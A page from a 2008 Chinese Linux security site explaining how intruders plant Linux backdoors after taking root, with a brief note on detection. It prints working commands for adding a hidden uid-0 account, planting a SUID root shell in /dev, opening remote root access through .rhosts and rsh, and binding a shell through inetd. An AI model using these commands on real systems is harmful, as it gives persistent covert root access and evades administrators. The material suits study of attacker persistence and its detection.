首页 | 资讯动态 | linux基础 | 系统管理 | 网络管理 | 编程开发 | linux数据库 | 服务器技术 | linux相关 | linux认证 | 嵌入式 | 下载中心 | 专题 | linux招聘 | 镜像站
OKLinux中文技术站
·设为首页
·加入收藏
·联系我们
系统管理: 中文环境 系统管理 桌面应用 内核技术 | Linux基础: 基础入门 安装配置 常用命令 经验技巧 软件应用 | Linux数据库: Mysql Postgre Oracle DB2 Sybase other
网络管理: 网络安全 网络应用 Linux服务器 环境配置 黑客安全 | 编程开发: PHP CC++ Python Perl Shell 嵌入式开发 java jsp | PHP技术: PHP基础 PHP技巧 PHP应用 PHP文摘
搜索中心 Linux招聘 Linux专题 Apache | Linux相关: 硬件相关 Linux解决方案 Linux认证 企业应用 其它Unix | 相关下载: 资料下载 参考手册 开发工具 服务器类 软路由 其它
 技术搜索:
会员中心 注册会员 高级搜索  
  → 当前位置:首页>网络管理>网络安全>正文

网络安全高级技巧之Linux后门技术与实践

http://www.oklinux.cn  2008-07-07  linuxidc   会员收藏  游客收藏  【 】 
您查看的文章来源于http://www.oklinux.cn

后门简介

入侵者完全控制系统后,为方便下次进入而采用的一种技术。一般通过修改系统配置文件和安装第三方后门工具来实现。 具有隐蔽性,能绕开系统日志,不易被系统管理员发现等特点。

常用后门技术

增加超级用户账号

破解/嗅探用户密码

放置SUID Shell

rhosts

利用系统服务程序

TCP/UDP/ICMP Shell

Crontab定时任务

共享库文件

工具包rootkit

可装载内核模块(LKM)

增加超级用户

# echo "e4gle:x:0:0::/:/bin/sh" >> /etc/passwd

# echo "e4gle::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

如果系统不允许uid=0的用户远程登录,还需要增加一个普通用户账号。

破解/嗅探用户密码

获得shadow文件后,用John the Ripper 工具破解薄弱的用户密码。安装sniffit等嗅探工具,监听telnet、ftp等端口,收集用户密码。

放置SUID Shell

# cp /bin/bash /dev/.rootshell

# chmod u s /dev/.rootshell

普通用户在本机运行/dev/.rootshell,即可获得一个root权限的shell。

rhosts

# echo " " > /.rhosts

# rsh -l root victim.com csh -i

远程可以得到一个rootshell。

利用系统服务程序。

修改/etc/inetd.conf, daytime stream tcp nowait /bin/sh sh -I ;用trojan程序替换in.telnetd、in.rexecd等inted的服务程序,重定向login程序。

TCP/UDP/ICMP Shell

BindShell,大部分是基于TCP/UDP协议的网络服务程序,在高端口监听,很容易被发现。Ping Backdoor,通过ICMP包激活后门,形成一个Shell通道。TCP ACK数据包后门,能够穿越防火墙。

Crontab定时任务

通过Crontab程序调度已安装的后门程序定时运行,一般在深夜时段,是系统管理员不在线的时间。

共享库文件

在共享库中嵌入后门函数使用后门口令激活Shell,获得权限能够躲避系统管理员对二进制文件本身的校验。

工具包Rootkit

包含一系列系统及后门工具:

- 清除日志中的登录记录

- 伪装校验和

- 替换netstat、ps等网络工具

- 后门登录程序易于安装和使用

可装载内核模块(LKM)

LKM:Loadable Kernel Modules 动态的加载,不需要重新编译内核。

截获系统调用,具有隐藏目录、文件、进程、网络连接等强大功能。

自身隐蔽性好,发现难度较大。

著名的LKM包有adore和knark。

后门的检测

以自己的经验,结合特定的工具,手工作一些检测。使用Tripwire或md5校验来检查系统。借助IDS系统,监听到目标机器的可疑网络连接。

实例:Login后门

入侵者先把原始的/bin/login备份,再用一段程序替换/bin/login。入侵者telnet登录进来的时候,通过环境变量或者终端类型,传递了正确的后门密码,将直接获得一个Shell;如果是普通用户登录,将会重定向到原始的login文件,来处理正常的登录。

共4页: 上一页 1 [2] [3] [4] 下一页

上一篇:Linux环境下杀Windows病毒 Avast! for Linux   下一篇:Ubuntu 8.04配置相关知识集

收藏于收藏夹】 【评论】 【推荐】 【打印】 【关闭
相关文档
·Linux环境下杀Windows病毒 Avast! for Linux
·7月份第2周计算机病毒预报
·修改Linux SSH默认22端口的几种方法
·为Linux蒙上Window伪面具请黑客入瓮
·千万不要认为Linux不会中病毒
·Linux系统安全详解
·Linux下使用DenyHosts 阻止SSH暴力破解
·在病毒不侵的Ubuntu Linux上安装杀毒软件
·清空密码登录Linux操作系统
·关于Ubuntu下如何使用iptables防火墙
·在Linux下安装杀毒软件简直是没事找事做
·也要当心Linux下病毒
·Linux 共享问题与防火墙
·Firefox 3 正式版发现首个严重安全漏洞
·Fedora 的网络设置好简单
·Linux下使用Wine运行熊猫烧香,你怕吗?
发表评论
密码: 匿名评论
评论内容:

(不超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规)
 
  最新文档
·Linux环境下杀Windows病毒 Avast! for
·7月份第2周计算机病毒预报
·修改Linux SSH默认22端口的几种方法
·为Linux蒙上Window伪面具请黑客入瓮
·千万不要认为Linux不会中病毒
·Linux系统安全详解
·Linux下使用DenyHosts 阻止SSH暴力破解
·在病毒不侵的Ubuntu Linux上安装杀毒软
·清空密码登录Linux操作系统
·关于Ubuntu下如何使用iptables防火墙
·在Linux下安装杀毒软件简直是没事找事
·也要当心Linux下病毒
  阅读排行
·为Linux服务器部署高效防毒软件
·从Linux内核的漏洞角度考虑系统安全
·通过Linux工具来全面保障无线网络安全
·linux安全:Linux ACL 体验
·用Apache Proxy的指令改进LAMP安全性
·玩转Ubuntu Linux之加密文件系统篇
·操作系统安全防护技巧介绍之Linux篇
·使用SSL 保护VNC应用程序
·通过Linux系统伪装方法加固系统安全
·MPPE加密VPN服务器详解
·使用mod_proxy改进LAMP 安全
·增强Linux/Unix服务器系统安全性介绍
·构筑Unix系统防火墙体系的多种解决方案
·在breezy安装AntiVir的全攻略
·Linux操作系统下的网络安全工具详细介
网摘收藏: